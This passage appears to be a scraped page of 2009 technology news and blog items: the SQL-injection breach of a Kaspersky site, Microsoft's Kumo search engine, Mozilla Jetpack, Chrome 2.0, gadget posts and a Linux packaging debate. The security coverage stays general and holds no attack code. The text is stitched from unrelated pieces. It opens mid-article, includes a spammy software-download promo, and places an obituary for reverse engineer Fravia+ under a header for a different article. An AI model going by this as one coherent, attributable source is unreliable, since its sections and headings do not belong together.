"They said they alerted us to the problem before making it public," said Schouwenberg. "They did -- but only by an hour."
They sent an email Saturday evening, Moscow time, to Kaspersky, he said.
The attack was likely more about the hackers' desire for 60 minutes of fame than anything else, he speculated.
Kaspersky developed the compromised site with a third party, Schouwenberg pointed out. "Unfortunately, there was some vulnerability in the code written by the third party that slipped by our review process. We could have done a better job in catching that, for our part."
As part of its clean-up efforts, Kaspersky has retained Next Generation Security Software's David Litchfield to conduct an independent audit and security risk analysis. The results, expected within 24 to 48 hours, will be posed on the company's Web site.
Previous internal reviews and audits had turned up vulnerabilities, "but they were never exploited in the wild," Schouwenberg said.
Could Happen to Anyone?
Kaspersky, no doubt, is mortified by the incident. (Schouwenberg readily acknowledged the lapse was bad, but also pointed out that the company's core competency is antimalware). Certainly, the breach is enough to cast doubt not only on Kaspersky's security bona fides, but also on the industry as a whole.
Companies that rely on the Internet security industry to protect their own operations and customers have reason for concern, suggested Rohyt Belani, CEO of Intrepidus Group. "SQL injections are the most deadly, and they are very difficult to protect against," he told TechNewsWorld. "This could have happened to almost anybody."
Unless a coder is highly attuned to the security implications, it is easy to write an application that could be vulnerable to such an attack, he said.
Take an online mortgage application, for example. The field that requests the name should be explicitly limited to accept only alphabet characters. However, a developer might not do this, Belani said, because names can require other characters, such as apostrophes.
"Attackers know that that particular field becomes part of a database query in the back end system -- so they inject SQL characters into that field, which can then modify the flow in the back end," he explained. If the attack is successfully executed, portions of the database can be shown back to the user or corrupted in certain ways.
Need to Test
Testing is the best protection.
"Here's another example of companies not testing their Web applications before deploying them out there for customers -- and hackers," Mandeep Khera, CMO for Cenzic, told TechNewsWorld.
This incident highlights a problem Cenzic has seen with other attacks -- which is that companies often don't find out they are being hacked for a long time -- and many times, they discover it only accidentally.
"Our advice to anyone who has a Web site with forms is to start testing those for vulnerabilities," he said, "and even if you can't fix all the vulnerabilities right away, at least make it difficult for those hackers who are going for the low-hanging fruit.

Can a Semantic Kumo Wrestle Google to the Mat?


In the realm of search, Microsoft trails far behind Google and Yahoo, two engines that deliver search results mainly by matching keywords. Can adding a little semantic technology give Microsoft's search engine a better idea of what's on the searcher's mind -- and thus attract more users? Redmond is expected to deliver such a product, known as "Kumo," in the coming weeks.


In about two weeks, Microsoft is expected to launch Kumo, its sort of old, sort of new search engine.
Microsoft regards Kumo as its Google (Nasdaq: GOOG) killer, according to analyst Rob Enderle of the Enderle Group, and the software company is banking heavily on it despite deep internal divisions over the project.
Kumo will reportedly take over Microsoft's Live Search and incorporate semantic Web search capabilities, which could be the next wave in search engine technology.
However, in some ways, the semantic Web is already creeping up on us -- we just don't know it yet.
What Is Kumo?
Kumo is a combination of Microsoft's Live Search search engine and semantic Web technology the vendor acquired when it bought Powerset in July 2008, according to semantic Web expert Michael K. Bergman, CEO and cofounder of Structured Dynamics.
"I have looked at what's been released with Kumo so far, and I'm quite familiar with Powerset," he told TechNewsWorld.
San Francisco-based Powerset offered search and natural language capabilities based on an exclusive license it secured for natural-language processing technology from Xerox's (NYSE: XRX) Palo Alto Research Center in early 2007.
Microsoft made the purchase after walking away from negotiations to buy Yahoo (Nasdaq: YHOO) earlier in the year.
Microsoft declined to comment for this story. "Microsoft does not comment on rumors or speculation," Waggener Edstrom Account Coordinator Katy Spaulding told TechNewsWorld in response to an email request.
The Google Killer?
Microsoft has long lagged behind Google and Yahoo in the search engine marketplace. It has a powerful incentive to challenge the market leaders: A strong search engine would help its online ads business.
To that end, it has shaped Kumo as its weapon against Google in the search engine war.
"Kumo was designed from the ground up to be a Google killer," Enderle told TechNewsWorld. "Microsoft put a lot of effort into it."
What does Google think about this new kid on the block?
"Search is a highly competitive industry, and we welcome competition that stimulates innovation and provides users more choice," Google spokesperson Nate Tyler told TechNewsWorld.
The project may be a costly one for Redmond. The amount of time and money Microsoft has spent on Kumo has caused deep divisions within the vendor's management, Enderle said.
"I understand a lot of people on the Microsoft board want them to stop this project," he added. "They want Microsoft to focus on things they do well and not waste any more money."
Talks With Yahoo Resume
Could that division be why Microsoft has reportedly resumed talks with Yahoo recently? Is Microsoft looking again to buy Yahoo's search engine?
Not likely, Enderle said. "We don't really know what they're talking to Yahoo about."
Buying up Yahoo's search technology now could prove troublesome, he noted.
"You wouldn't want to throw together a lot of technologies from different vendors in the hope that they're going to work," Enderle explained. "You'll spend all your time trying to integrate these separate products that weren't built with the idea of integrating with anything else."
The Semantic Web
The semantic Web provides a common framework that lets data be shared and reused across applications, enterprises and communities, according to W3C, an international Web standards consortium.
The semantic Web is essentially already here, and Kumo is a part of it, Structured Dynamics' Bergman said. "Google's doing a lot there, but very quietly."
Basically, the semantic Web adds structure to Web searches. However, users will see increased structure such as the search results in the center of the page and a hierarchical organization of concepts or attributes in the left-hand column, which is what Kumo appears to be doing.

Mozilla Straps On Jetpack for Firefox Devs


Jetpack is Mozilla's new API for developers to create add-ons for the Firefox Web browser. Currently, many Firefox add-ons work through an extension called "Greasemonkey," which some fear may disappear if Jetpack takes off. Jetpack, however, has its advantages in terms of compatibility and the ability to activate new features without a browser restart.

Mozilla's call to developers to participate in its Jetpack project on Wednesday is the latest onslaught in the ongoing war of the Web browsers.
Jetpack is an open source application programming interface (API) that will let users create add-ons for Mozilla's Firefox browser using the Web technologies they already know.
Google (Nasdaq: GOOG) has launched a project to add extensions to its Chromium open source code that closely follows Mozilla's direction in some respects.
Meanwhile, some developers are concerned that the launch of Jetpack could mean Mozilla will kill off Greasemonkey, a Firefox extension that lets users customize the way Web pages look and feel.
About Jetpack
Jetpack is an exploration in using Web technologies such as HTML, CSS and JavaScript to create add-ons for the Firefox browser, according to Mozilla.
It will let users add new features without having to worry about compatibility and without having to restart their browsers, as is now the case.
"Jetpack is an open source platform on top of which anybody that can write a Web page can now enhance the browser," Asa Raskin, head of user experience at Mozilla Labs, told LinuxInsider. "We want to make the Web better and make it as personal as it can be."
The current Jetpack release version is 0.1, which means it needs a lot more work. Mozilla intends to tweak and fine-tune the project with feedback from developers, especially on the API design.
"We ask ourselves, what are the cool innovations we can't see around the corner that are coming, because all of a sudden there are new communities -- students, anyone who can create a Web page -- that are making the open Web a better space," Raskin said.
Staving Off the Competition
The timing of Mozilla's announcement -- one week before Google's I/O Developer Conference, to be held in San Francisco May 27 and 28 -- is no coincidence, according to Laura DiDio, principal at research firm ITIC.
"It's an attempt to fight off Google Chrome and Internet Explorer 8," she told LinuxInsider.
"Is it a pre-emptive strike? Yes," DiDio said. "Mozilla's more concerned about Google than Microsoft."
The 800-Pound Googorilla
There's good reason to fear Google. The Internet giant released version 2.0 of its Chrome browser to the public on Thursday.
In addition to being faster, Chrome 2.0 is more stable; has an improved New Tab page; offers full-screen mode; and has Form Autofill.
Google has fixed more than 300 bugs that caused crashes since it launched the browser eight months ago, the company said.
Extensions to Chrome
Google is also working on extensions to Chromium, the open source project whose code Chrome is built on.
It is closely following Mozilla's lead in extensions. "Most extensions should be able to load in place without forcing a browser restart or even a page reload when they are installed," the Chromium developer documentation for extensions states.
As is the case with Mozilla's Jetpack, Google wants Web developers to use JavaScript, HTML and cascading style sheets (CSS) to create Chromium extensions.
Google wants use cases for Chromium extensions to be like Greasemonkey. One of these APIs will consist of read-write user scripts that will inject JavaScript into Web pages.
Monkey Gone to Heaven?
Some Mozilla users have begun voicing fears that Jetpack will kill off Greasemonkey.
"How is this any different from Greasemonkey?" asked Casey in a comment on the Mozilla Jetpack blog. "Aren't you just risking taking development resources away from them and their community when they already have something great in place?"
Greasemonkey is not a Mozilla project, Raskin pointed out. However, there is no conflict between Greasemonkey and Jetpack.
"Greasemonkey is an awesome Firefox extension," Raskin said, "but it's about modifying pages you're looking at, whereas Jetpack lets you modify the browser."

Chrome 2.0 Juices Up JavaScript

A new version of Google's Chrome browser boasts faster speed by way of improvements to V8 and WebKit. Other new features include full-screen mode and autofill. A faster JavaScript experience, however, could also pave the way for faster malware, since the language is a favorite among scammers. Google contends Chrome is no less safe than other browsers.
Google (Nasdaq: GOOG) on Thursday revealed Chrome 2.0, a purportedly faster and more feature-filled version of the search giant's Web browser.
The extra speed comes from an update to its V8 JavaScript engine and from a new version of the open source WebKit rendering engine.
However, Chrome's speed advantage may soon be overshadowed by rivals. Mozilla , for example, is expected to release a final version of Firefox 3.5.
Also, speeding up JavaScript may lead to security problems.
New Features in Chrome 2.0
Chrome 2.0 is faster than Version 1, released eight months ago, because it runs JavaScript faster, according to Google.
It also incorporates some of the features beta testers requested the most. One is an improved new tab page that lets users remove thumbnails.
Another is a new full-screen mode, and a third feature is form autofill.
However, full-screen mode and form autofill are both features other browsers have had for a while (think deadly rivals Internet Explorer and Firefox).
Why Chrome 2.0 Works Faster
The V8 JavaScript engine is open source technology developed by Google and written in C++. It increases performance by compiling JavaScript to native machine code before execution, instead of to a bytecode or interpretation.
It also employs optimization techniques such as inline caching, which remembers the results of a previous method lookup directly at the call site. A call site of a function is a line in the code that passes arguments to the function and receives return values in exchange.
These optimizations let JavaScript applications run at the speed of a compiled binary.
Will Firefox Pose a Speed Challenge?
Chrome 2.0 may not hold its speed advantage very long, however -- Mozilla will issue the release candidate (RC) of Firefox 3.5 in the first week of June, according to Mozilla director Mike Beltzner's post on the company's blog. That new version of the browser could be sped up too.
"It's pretty common competition among the browsers -- they always want to be fastest," Randy Abrams, director of technical education at security software vendor ESET, told TechNewsWorld.
Mozilla did not respond to requests for comment by press time.
Speed Kills?
Supercharging JavaScript may not always result in a faster user experience.
"I'm not sure how big an impact speeding up JavaScript is going to make unless you're using some huge JavaScript application," ESET's Abrams said.
Speeding up JavaScript could also speed up the malware based on the language.
"Malware based on JavaScript will run faster," Abrams said. "JavaScript is the vector of choice for drive-by attacks."
In a drive-by attack, a Web page containing malicious code downloads that code onto visitors' computers without their knowledge or permission ,and without the user having to click on any links.
Malware authors use JavaScript in almost 90 percent of Web pages that contain malicious script, according to Stephan Chenette, manager of security at Web security software vendor Websense.
Hard to Scratch Chrome?
It's not necessarily open season on users of Google Chrome, since it uses a sandboxing model that makes it difficult to hack, Google spokesperson Eitan Bencuya told TechNewsWorld.
Sandboxing means isolating code so that it cannot interact with the operating system or applications on a user's computer.
Still, ESET's Abrams thinks sandboxing is not enough. "Chrome does have some protection other browsers don't, in that it sandboxes individual tabs," he said. "That might protect the operating system itself, but it's not going to do anything to protect you against cross-site scripting or clickjacking."
Sandboxing offers only limited protection, he warned. "It's only effective if you go to each different site in a different tab. Otherwise, the old data will be accessible when you use the same tab to click on a new site."
Google contends Chrome is no less safe than other browsers. "All of the topics you mention are tough issues to fight, and they affect all browsers," Bencuya said.

Monday, May 18, 2009

Unboxing the 22-inch iZ3D 3D Monitor

Opening a brand new piece of electronic kit is like Christmas to me, so I decided to share my gleeful glee with you. Yes, it’s true: You have the privilege of seeing yours truly unboxing and depackaging the robust 22-inch 3D monitor from iZ3D. Pics and video after the jump.

If the mere unboxing of this monitor is all the convincing you need, it’s got a $50 discount at Newegg right now.

Apple, iPhone King of Smartphones

Proving once again its chiefdom and absolute head honcho position at the top of the smartphone class, the Apple iPhone came in first in a JD Power and Associates survey about how satisfied customers have been with their life-management devices. Outstripping other “competitors” like HTC and RIM, the iPhone is king, at least in the customer’s minds, on a variety of different features. Details after the jump.

Apple got “among the best” scores on design, ease of operations, features and OS. However the iPhone tanked on battery life. HTC also lost some traction on battery life, however RIM’s Blackberry was ranked among the best in battery life on cell phones. Life’s Good for LG, top in the customer’s mind in non-smartphones (those regular phones that don’t do much but call people – how dull) but we won’t hold that against them. Sony Ericsson wasn’t far behind LG in the regular cell phone class.

In other random facts, the JD Powers study also pointed out that more and more smartphone users are electing to rely entirely on mobile communications, getting rid of their landlines. Also, 1/3 of traditional cell phone users said they would like to get an upgrade on features – mostly GPS capabilities – in their next phone. There you go, looks like the Garmin-Asus Nuvifone will have a market.
In the race to make the XenoProduct, rumors flutter to and fro about consoles becoming a home PET scanner and dessert topping, and your controller a Bass-O-Matic and cat o’ nine tails. Rising to the top yet again is the rumor of a Playstation phone.

Sony Ericsson jefe Hideki Komiyama recently told The Financial Times that “… as part of his recovery plan for Sony Ericsson, a good idea would be to leverage Sony’s brand recognition in the gaming market, and that a PlayStation phone built on SE’s current Walkman and Cybershot handsets ‘could happen’.”

Is this a leak or wishful thinking? It seems like it might be a little late to start working on a Playstation Phone, doesn’t it?

Star Trek Review–Sure Feels Good to be a Trekkie

I really do love Star Trek. I can’t however, call myself a full fledged Trekkie. If Trekkies were categorized according to the Starfleet’s table of ranks, I’d probably only be a junior grade lieutenant, a provisional lieutenant commander at best. But compared to the average civvie, I do concern myself with the details, background info and plot consistency–the lore, really–of the Star Trek Universe. That’s why, despite a few awkward moments, I’m genuinely surprised and pleased to have loved the hell out of J. J. Abram’s Star Trek: The College Years.

The Latest Acer Aspire Boasts Better Specs

The latest Acer Aspire One 571 (not to be confused with the already out and same old specs Acer Aspire One 751) boasts upgraded specs not typical of netbooks. Which is something to really get excited about.

The 571 looks the same on the outside, but it’s what’s inside that counts. The 10.1″ screen has a resolution of 1280×720p and a 16:9 aspect ratio. That’s HD on a netbook. To make HD possible, this Acer has been updated with a Quartics q1721 Multimedia Coprocessor that allows the netbook to decode H.264 - aka HD video at the previously mentioned resolution.

Then on the left side of the netbook they have added a Vmedia optical drive. No word on price or dates, but you can check out our review of the best netbooks on the market while you’re waiting.

Harry Potter and the Half-Blood Prince Video Game Release Date

Harry Potter and the Half-Blood Prince hits theaters July 15th, but you won’t have to wait that long to explore Hogwarts and its environs. Below you’ll find not only more info, but you’ll have to fight off a hoard ofInferi!

Yeah I know that was lame.

The video game version of Harry Potter and the Half-Blood Prince comes to PS2, PS3, 360, Wii, PSP, and DS; as well as both PCs and Macs June 30th. They even say it comes to “… mobile devices,” so does that mean iPhones, BlackBerries, and/or G1s? Maybe just Windows Mobile devices?

You’ll be able to perform the usual assortment of wizardry and witchcraft, but there are a few new things in Half Blood Prince, like managing Ron Weasley’s love life and studying potionology. I hope there will be more interactive environs in this one, mainly to satisfy my destructive desires.

Kaspersky Internet Security

Kaspersky Internet Security 9.0.0.413 Beta is a Antivirus Software product from kaspersky.com, get 5 Stars SoftSea Rating, Kaspersky Internet Security technological prototype represents a new generation platform for creating applications specifically designated for complex protection of personal computers and workstations. Uniting the substantially improved functional capabilities of version 5.0, Kaspersky Lab protection products with the latest technological innovations introduced by the company the Kaspersky Internet Security solution secures the most impactful and complete protection of a computer from all sorts of electronic threats - malicious programs, hacker attacs and spam. The license of this antivirus & security software is Free Trial Software, you can free download and get a free trial before you buy. If you want to get a full or nolimited version of Kaspersky Internet Security, you can buy this antivirus & security software.

The Great Debate Over a Linux Standard Package Format

Does FOSS need a common packaging framework? It's an unnecessary waste of time, argued opponents. It will save developers loads of time, insisted proponents. It's irrelevant, chimed in Slashdot blogger hairyfeet: "The problem with Linux is NOT the packages, it is the fact that trying to develop for Linux is like trying to hit a dartboard with a live bumblebee."
----------------------------------------------------------
Conversation on the Linux blogs tends to be either outraged and angry (probably most common) or jubilant and enthusiastic (generally when Redmond is taken down a notch or two). In the last few days, however, some of it has been positively mournful.

The cause? Widely revered reverse engineer Fjalar Ravia -- more commonly known by his pseudonym "Fravia+" -- passed away on Sunday, May 3, 2009.

In April, Fravia+ posted a farewell message on his blog, announcing that he had just weeks to live after battling cancer for more than two years.

Jun Auza called attention to the post on his blog, prompting Linux geeks far and wide to pause and reflect.

'Big Respect to a Great Coder'

"Fravia+ ... perhaps one of the most influential individuals I've had the chance to encounter on the internet," wrote Anonymous in the comments on Auza's post.

"His many websites are a gigantic source of wisdom and of useful information. I've studied reverse engineering through him, his tutorials and challenges -- all in the hope of becoming a better programmer and person," Anonymous added. "Thanks Fravia+ for all the information, the time was well spent."

Similarly: "Big respect to a great coder and someone that freed a lot of information," added HexJam.

'His Work Will Continue'

"Perhaps this is a good time to take a collective pause and consider that there may be more to life than just tech stuff," Montreal consultant and Slashdot blogger Gerhard Mack offered.

On the other hand: "It is sad when someone who contributes so much to openness departs, but his work will continue," blogger Robert Pogson told LinuxInsider by email. "It angers me that M$ and others make such an effort to be closed that we have to spend our lives fighting it."

'Nobody Needs a Unified Format'

Speaking of the battle with Redmond -- and strategies for victory -- an interesting conversation arose when TuxRadar recently asked the question, "Do we need a standard package format?"

A virtual stampede of more than 120 comments greeted the question on TuxRadar before it was picked up on Digg as well.

"No," wrote person-b in the comments following the TuxRadar post. "Nobody needs a unified format. Everybody should just use 'alien' to convert packages to their native format if the owners can't be bothered to package it properly."

'Would It Make Any Difference?'

On the other hand: "Absolutely," shot back geekyBodhi. "Not only will it be simpler for users, it'll also save app developers and packagers loads of time."

Then again: "Would it make any difference?" asked Martin from Sweden. "I think the solution is things like Linux Standard Base and then a user friendly front end to 'alien', as well as using a solution like PackageKit besides the distributions' other packaging tools."

Not long ago, we here at LinuxInsider investigated a similar question regarding the existence of multiple distros. Now, given the divided nature of opinions on this one, we couldn't resist digging a little deeper.

'I Don't Think It Should Be RPM'

"I think we need a standard package format," Mack told LinuxInsider.

"I don't think it should be RPM," he added. "On the other hand, it might just end up that RPM-based distros will become yesterday's news. I had a 'nothing on my desktop but Fedora' coworker make the jump after he got used to apt-get on our servers."

The case for standard package formats is strongest "when one is trying to woo proprietary software developers to a Linux distro," Chris Travers, a Slashdot blogger who works on the LedgerSMB project, told LinuxInsider.

"If you build open source More about open source software and your software is valuable, people will package it for whatever distribution they want to use it on," Travers explained. "So, the first question we have to ask is, do we need closed source software on Linux? Do we care enough to make it easy to make such software packages by vendors?"

'Lightweight Work'

A second argument that's sometimes advanced is that "packaging for many distributions consumes developer time needlessly," Travers noted. "The fact, however, is that testing still needs to be done on the target distro, and this is one of the packager's jobs."

Packaging is also "somewhat lightweight work," he added, "but it requires knowledge of how the software should be correctly implemented on a specific distro" and so provides "opportunities for community members of open source projects to get involved," he said.

In short, "I don't think that a common packaging framework would necessarily be particularly helpful to open source projects," Travers concluded.

Lack of Support

At least one blogger saw the question in an entirely different light.

"The problem with Linux is NOT the packages, it is the fact that trying to develop for Linux is like trying to hit a dartboard with a live bumblebee," Slashdot blogger hairyfeet told LinuxInsider via email.

To illustrate: "A friend of mine brought over a scanner the other day," hairyfeet recounted. "It was released nearly 9 years ago, but you know what? It works in XP SP3. That is because the driver for Win2K -- released nearly 9 years ago -- still worked. I run games and programs from the Win98 era. That is 11 years and it still works on XP SP3.

"Now compare that to Linux," hairyfeet added. "Does anyone honestly think they can use a driver from even 3 years ago in Linux? Or that getting a program from even 5 years ago working wouldn't be an exercise in frustration?"

That is why Linux "isn't getting market share," hairyfeet explained. "It isn't the packages, it isn't the lack of exposure, it is simply the fact that hardware manufacturers by and large refuse to support it."

'Linux Simply Isn't Stable'

There's also good reason for that refusal, he asserted. "It is because Linux simply isn't stable as a platform, and if it keeps going like this it never will be.

"If I am a hardware manufacturer, competing with all the other manufacturers, I have two choices: I can write three drivers -- Win98/ME, Win2K/XP and WinVista/7 -- and have every single Windows OS covered from 1998 to 2011 at least," he said. "If I write for Linux, exactly WHICH Linux? Red Hat or Debian based? Stable, testing, long term support? How long will my customers be able to use the driver I release today before it no longer functions?"

In short, "If Linux is going to get the crucial hardware manufacturers to support it, then like Windows they need to be able to release a driver today and have it work years and years into the future without maintenance," he concluded. "To truly succeed, Linux needs to have a truly stable long term underlying framework that the manufacturers can target."